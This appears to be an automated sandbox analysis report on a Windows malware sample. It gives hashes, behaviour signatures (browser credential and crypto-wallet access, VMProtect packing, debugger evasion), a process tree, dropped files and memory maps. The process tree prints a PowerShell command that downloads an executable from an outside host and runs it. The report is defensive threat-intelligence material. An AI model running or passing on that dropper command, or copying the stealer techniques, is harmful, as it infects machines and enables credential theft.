Analysis

  • max time kernel
    136s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    26-12-2021 05:00

General

  • Target

    e338d3183fec33ba6eb7ff3143875770.exe

  • Size

    523KB

  • MD5

    e338d3183fec33ba6eb7ff3143875770

  • SHA1

    08abb150c93eb17844552aaa9011442b73a7ce0a

  • SHA256

    281ca3e54eb8ab778b6675e367989a8672d16d4593a6e50f94044ee0f98e209b

  • SHA512

    ab05085f94a496cd884345e29b1849739cc1e18d6ab4e54ab80f31bfa0d20a7c5dfc7e31d71fd99e3657d7886e7ccb968a8b6c318e0e654c87390642ffb4248d

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://antivirf.ru/frome.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • VMProtect packed file 9 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e338d3183fec33ba6eb7ff3143875770.exe
    "C:\Users\Admin\AppData\Local\Temp\e338d3183fec33ba6eb7ff3143875770.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Users\Admin\AppData\Local\Temp\e338d3183fec33ba6eb7ff3143875770.exe
      C:\Users\Admin\AppData\Local\Temp\e338d3183fec33ba6eb7ff3143875770.exe
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Users\Admin\AppData\Local\Temp\Update.exe
        "C:\Users\Admin\AppData\Local\Temp\Update.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('https://antivirf.ru/frome.exe', (Join-Path -Path $env:AppData -ChildPath 'frome.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'frome.exe')" & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:816
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "(New-Object System.Net.WebClient).DownloadFile('https://antivirf.ru/frome.exe', (Join-Path -Path $env:AppData -ChildPath 'frome.exe'))"
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'frome.exe')"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:960
      • C:\Users\Admin\AppData\Local\Temp\Updater.exe
        "C:\Users\Admin\AppData\Local\Temp\Updater.exe"
        3⤵
        • Executes dropped EXE
        • Drops startup file
        PID:1800
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://track.dvndr.net/go?offer=2107&sid=41847
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1456 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1720

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    MD5

    e03feea6f406f258cf0ad4b23be5482c

    SHA1

    a33d7484d9b9bc3387c057b0070f89aee8079db9

    SHA256

    465bf4790bdca1034675fd5c05c21ff6f08cc0b68e7e56ef4a7fa01694e478ff

    SHA512

    5928389eadbf201d20c5d1682f699ef8639222efe5d5c318a982ac5c6ab35e7925274e8974db7e763fe8bf6783d88530f117d83f29e1e8825be3169f5538decf

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\7w612sw\imagestore.dat

    MD5

    d695b44ed1c40a9eec7e3c2649f4938e

    SHA1

    0a2ba9b8a6c049c41d2e1f86a50fab40d01a643a

    SHA256

    13aab4babbd5bdc0f1e3c37a7eb7cdeaf20c2e653156f529ca9dc882f2697d1d

    SHA512

    4b1ac5112bf49635f058d5fb4999a67c8ece11bab53f76787fb11c0882ded7ca3bbb952cba80fe44993fd2e556e20121c4778893ca04088faa5fa571aa65ca79

  • C:\Users\Admin\AppData\Local\Temp\Update.exe

    MD5

    14b005ae02234fabebbdbbb86739beff

    SHA1

    e0c6d8ddfa947ecd74a7b181b6484f3a5c2d9285

    SHA256

    274324f3c3aa416a539f8054a227bd6e9bd5686a91fc53d2bb609887a3803a58

    SHA512

    7292afac4726435ee38ee015615f532dcb61002b78d37b5990a75fdd3a5706e7582a8d2a4f2d96b4cc41d021d750b436a582e20a146bf145f0eddcdd4ce6ddb6

  • C:\Users\Admin\AppData\Local\Temp\Update.exe

    MD5

    14b005ae02234fabebbdbbb86739beff

    SHA1

    e0c6d8ddfa947ecd74a7b181b6484f3a5c2d9285

    SHA256

    274324f3c3aa416a539f8054a227bd6e9bd5686a91fc53d2bb609887a3803a58

    SHA512

    7292afac4726435ee38ee015615f532dcb61002b78d37b5990a75fdd3a5706e7582a8d2a4f2d96b4cc41d021d750b436a582e20a146bf145f0eddcdd4ce6ddb6

  • C:\Users\Admin\AppData\Local\Temp\Updater.exe

    MD5

    f50ddee232b8941986950dc42d8f5251

    SHA1

    f27a87a24492c9c537666654f22482e733c202c6

    SHA256

    789ad793931e1bf08389629880c026c8a57cf84dcf1f33072afa4025ae29293a

    SHA512

    f3065a88ff2cffff65ddebf6f7dae887c6532acee7132d47a42d950cd67a0e0e34792ae439702d69342e1b90045817635a759fd84ad108549d88060b19e4759b

  • C:\Users\Admin\AppData\Local\Temp\Updater.exe

    MD5

    f50ddee232b8941986950dc42d8f5251

    SHA1

    f27a87a24492c9c537666654f22482e733c202c6

    SHA256

    789ad793931e1bf08389629880c026c8a57cf84dcf1f33072afa4025ae29293a

    SHA512

    f3065a88ff2cffff65ddebf6f7dae887c6532acee7132d47a42d950cd67a0e0e34792ae439702d69342e1b90045817635a759fd84ad108549d88060b19e4759b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TRU9ER4T.txt

    MD5

    2e4e68a437ddc18a6bb9d94288e05096

    SHA1

    8a495d2a03d8da3df7a650186025feb7413fc1bd

    SHA256

    4649211303ab04b3be4395ce22384e87943150c5eeb97226fb147018da4f3c25

    SHA512

    07f494be737365e938156949cd85c70a5454263c53d7550e243f8fb9dd759482b6399e8015b31e1ac2c487a4baafe0987071e39b0f179c75adf7f1516f28fe4a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    MD5

    57e53fbf9036d1313b64c0b6afe8d254

    SHA1

    d7040c2cc1ccaecfa3aa862bdf55dd833a513d60

    SHA256

    9cecd258209439edba939a2d8db6703bc7885534896c9d2cc5d84042e518bc3f

    SHA512

    7946044a971b8743cd57b95567485e66b6b288e99576687f6a02fe7677c01fc3339f8ba1fe8d6a409dcb501285b1cd4ccc6e423e5e7f1b87669f00cbfe6ee747

  • \Users\Admin\AppData\Local\Temp\Update.exe

    MD5

    14b005ae02234fabebbdbbb86739beff

    SHA1

    e0c6d8ddfa947ecd74a7b181b6484f3a5c2d9285

    SHA256

    274324f3c3aa416a539f8054a227bd6e9bd5686a91fc53d2bb609887a3803a58

    SHA512

    7292afac4726435ee38ee015615f532dcb61002b78d37b5990a75fdd3a5706e7582a8d2a4f2d96b4cc41d021d750b436a582e20a146bf145f0eddcdd4ce6ddb6

  • \Users\Admin\AppData\Local\Temp\Updater.exe

    MD5

    f50ddee232b8941986950dc42d8f5251

    SHA1

    f27a87a24492c9c537666654f22482e733c202c6

    SHA256

    789ad793931e1bf08389629880c026c8a57cf84dcf1f33072afa4025ae29293a

    SHA512

    f3065a88ff2cffff65ddebf6f7dae887c6532acee7132d47a42d950cd67a0e0e34792ae439702d69342e1b90045817635a759fd84ad108549d88060b19e4759b

  • memory/696-62-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-60-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-67-0x0000000000AE0000-0x0000000000AE1000-memory.dmp

    Filesize

    4KB

  • memory/696-65-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-64-0x00000000004191B6-mapping.dmp

  • memory/696-63-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-66-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-61-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/696-59-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/816-119-0x0000000000000000-mapping.dmp

  • memory/864-124-0x0000000002300000-0x0000000002F4A000-memory.dmp

    Filesize

    12.3MB

  • memory/864-123-0x0000000002300000-0x0000000002F4A000-memory.dmp

    Filesize

    12.3MB

  • memory/864-122-0x0000000002300000-0x0000000002F4A000-memory.dmp

    Filesize

    12.3MB

  • memory/864-121-0x00000000760F1000-0x00000000760F3000-memory.dmp

    Filesize

    8KB

  • memory/864-120-0x0000000000000000-mapping.dmp

  • memory/960-128-0x0000000002440000-0x0000000002441000-memory.dmp

    Filesize

    4KB

  • memory/960-125-0x0000000000000000-mapping.dmp

  • memory/960-129-0x0000000002441000-0x0000000002442000-memory.dmp

    Filesize

    4KB

  • memory/960-130-0x0000000002442000-0x0000000002444000-memory.dmp

    Filesize

    8KB

  • memory/1456-102-0x0000000000000000-mapping.dmp

  • memory/1668-90-0x0000000000300000-0x0000000000301000-memory.dmp

    Filesize

    4KB

  • memory/1668-81-0x0000000000190000-0x0000000000191000-memory.dmp

    Filesize

    4KB

  • memory/1668-69-0x0000000000000000-mapping.dmp

  • memory/1668-92-0x0000000000310000-0x0000000000311000-memory.dmp

    Filesize

    4KB

  • memory/1668-93-0x0000000000310000-0x0000000000311000-memory.dmp

    Filesize

    4KB

  • memory/1668-95-0x0000000000420000-0x0000000000421000-memory.dmp

    Filesize

    4KB

  • memory/1668-94-0x0000000000420000-0x0000000000421000-memory.dmp

    Filesize

    4KB

  • memory/1668-97-0x0000000000430000-0x0000000000431000-memory.dmp

    Filesize

    4KB

  • memory/1668-98-0x0000000000430000-0x0000000000431000-memory.dmp

    Filesize

    4KB

  • memory/1668-99-0x0000000000430000-0x0000000000431000-memory.dmp

    Filesize

    4KB

  • memory/1668-100-0x0000000000B20000-0x000000000159C000-memory.dmp

    Filesize

    10.5MB

  • memory/1668-87-0x00000000002F0000-0x00000000002F1000-memory.dmp

    Filesize

    4KB

  • memory/1668-77-0x0000000000180000-0x0000000000181000-memory.dmp

    Filesize

    4KB

  • memory/1668-76-0x0000000000180000-0x0000000000181000-memory.dmp

    Filesize

    4KB

  • memory/1668-106-0x0000000000420000-0x0000000000421000-memory.dmp

    Filesize

    4KB

  • memory/1668-78-0x0000000000180000-0x0000000000181000-memory.dmp

    Filesize

    4KB

  • memory/1668-79-0x0000000000190000-0x0000000000191000-memory.dmp

    Filesize

    4KB

  • memory/1668-80-0x0000000000190000-0x0000000000191000-memory.dmp

    Filesize

    4KB

  • memory/1668-86-0x00000000002F0000-0x00000000002F1000-memory.dmp

    Filesize

    4KB

  • memory/1668-89-0x0000000000300000-0x0000000000301000-memory.dmp

    Filesize

    4KB

  • memory/1668-83-0x00000000001A0000-0x00000000001A1000-memory.dmp

    Filesize

    4KB

  • memory/1668-84-0x00000000001A0000-0x00000000001A1000-memory.dmp

    Filesize

    4KB

  • memory/1720-107-0x0000000000000000-mapping.dmp

  • memory/1800-73-0x0000000000000000-mapping.dmp

  • memory/1800-110-0x0000000000240000-0x0000000000241000-memory.dmp

    Filesize

    4KB

  • memory/1800-109-0x000000001B630000-0x000000001B632000-memory.dmp

    Filesize

    8KB

  • memory/1800-105-0x0000000001160000-0x0000000001308000-memory.dmp

    Filesize

    1.7MB

  • memory/1800-104-0x0000000001160000-0x0000000001308000-memory.dmp

    Filesize

    1.7MB

  • memory/1812-113-0x0000000000400000-0x0000000000404000-memory.dmp

    Filesize

    16KB

  • memory/1812-112-0x0000000000400000-0x0000000000404000-memory.dmp

    Filesize

    16KB

  • memory/1812-118-0x0000000000400000-0x0000000000404000-memory.dmp

    Filesize

    16KB

  • memory/1812-117-0x00000000004012A5-mapping.dmp

  • memory/1900-55-0x00000000010E0000-0x000000000116A000-memory.dmp

    Filesize

    552KB

  • memory/1900-57-0x0000000004C70000-0x0000000004C71000-memory.dmp

    Filesize

    4KB

  • memory/1900-58-0x00000000003A0000-0x00000000003A1000-memory.dmp

    Filesize

    4KB

  • memory/1900-56-0x00000000010E0000-0x000000000116A000-memory.dmp

    Filesize

    552KB